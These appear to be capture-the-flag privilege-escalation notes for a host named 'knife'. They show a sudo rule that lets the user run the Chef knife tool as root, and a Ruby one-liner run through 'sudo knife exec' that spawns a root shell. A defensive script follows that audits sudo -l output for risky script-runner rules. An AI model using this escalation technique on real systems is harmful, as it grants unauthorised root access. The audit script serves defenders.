3 privesc

james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

james@knife:~$ ls -la /usr/bin/knife
lrwxrwxrwx 1 root root 31 May  7 11:03 /usr/bin/knife -> /opt/chef-workstation/bin/knife

Running sudo /usr/bin/knife on its own prints the usage docs. Reference:
https://docs.chef.io/workstation/knife/
https://docs.chef.io/workstation/knife_exec/
knife exec runs Ruby scripts, so we can create an .rb file and run it as root through sudo.

james@knife:/opt/chef-workstation/bin$ cd /home/james
james@knife:~$ echo "system('/bin/bash')" > shell.rb
james@knife:~$ chmod +x shell.rb
james@knife:~$ sudo /usr/bin/knife exec shell.rb
root@knife:/home/james# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
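
The defensive counterpart to the session above, as an added example (not part of the original notes): a shell function that reads sudo -l output and flags rules that let a user run a script-capable tool as another user with unrestricted arguments. The runner list, the HIGH/MEDIUM labels and the second sample rule are assumptions made for illustration.

```shell
#!/bin/sh
# Assumed, illustrative list of tools that execute arbitrary scripts.
# knife is the one from this page (via `knife exec`).
SCRIPT_RUNNERS="knife ruby python python3 perl"

# Sample input: the sudo -l output shown above, plus one constructed
# rule (systemctl) for contrast.
sample_sudo_l() {
cat <<'EOF'
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/systemctl status ssh
EOF
}

# Reads sudo -l output on stdin; prints "<severity> <runas> <command>" for
# every script runner allowed without an argument restriction.
audit_sudo_rules() {
  awk -v runners="$SCRIPT_RUNNERS" '
    BEGIN { n = split(runners, r, " "); for (i = 1; i <= n; i++) risky[r[i]] = 1 }
    /^[ \t]+\(/ {                       # rule lines: "    (root) TAG: /path [args]"
      line = $0; sub(/^[ \t]+/, "", line)
      runas = line; sub(/\).*/, ")", runas)
      rest = line;  sub(/^\([^)]*\)[ \t]*/, "", rest)
      nopass = 0
      cnt = split(rest, items, /,[ \t]*/)  # one rule may list several commands
      for (k = 1; k <= cnt; k++) {
        item = items[k]; sub(/[ \t]+$/, "", item)
        while (match(item, /^[A-Z_]+:[ \t]*/)) {   # strip tags such as NOPASSWD:
          if (substr(item, 1, RLENGTH) ~ /^NOPASSWD:/) nopass = 1
          item = substr(item, RLENGTH + 1)
        }
        nf = split(item, parts, /[ \t]+/)
        base = parts[1]; sub(/.*\//, "", base)
        # A sudoers command with no arguments listed accepts any arguments.
        if ((base in risky) && nf == 1)
          printf "%s %s %s\n", (nopass ? "HIGH" : "MEDIUM"), runas, parts[1]
      }
    }'
}

sample_sudo_l | audit_sudo_rules
```

On a live host, pipe the real listing in instead: sudo -l | audit_sudo_rules. A flagged rule is best replaced with a wrapper script or a sudoers entry that pins the exact subcommand and arguments.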
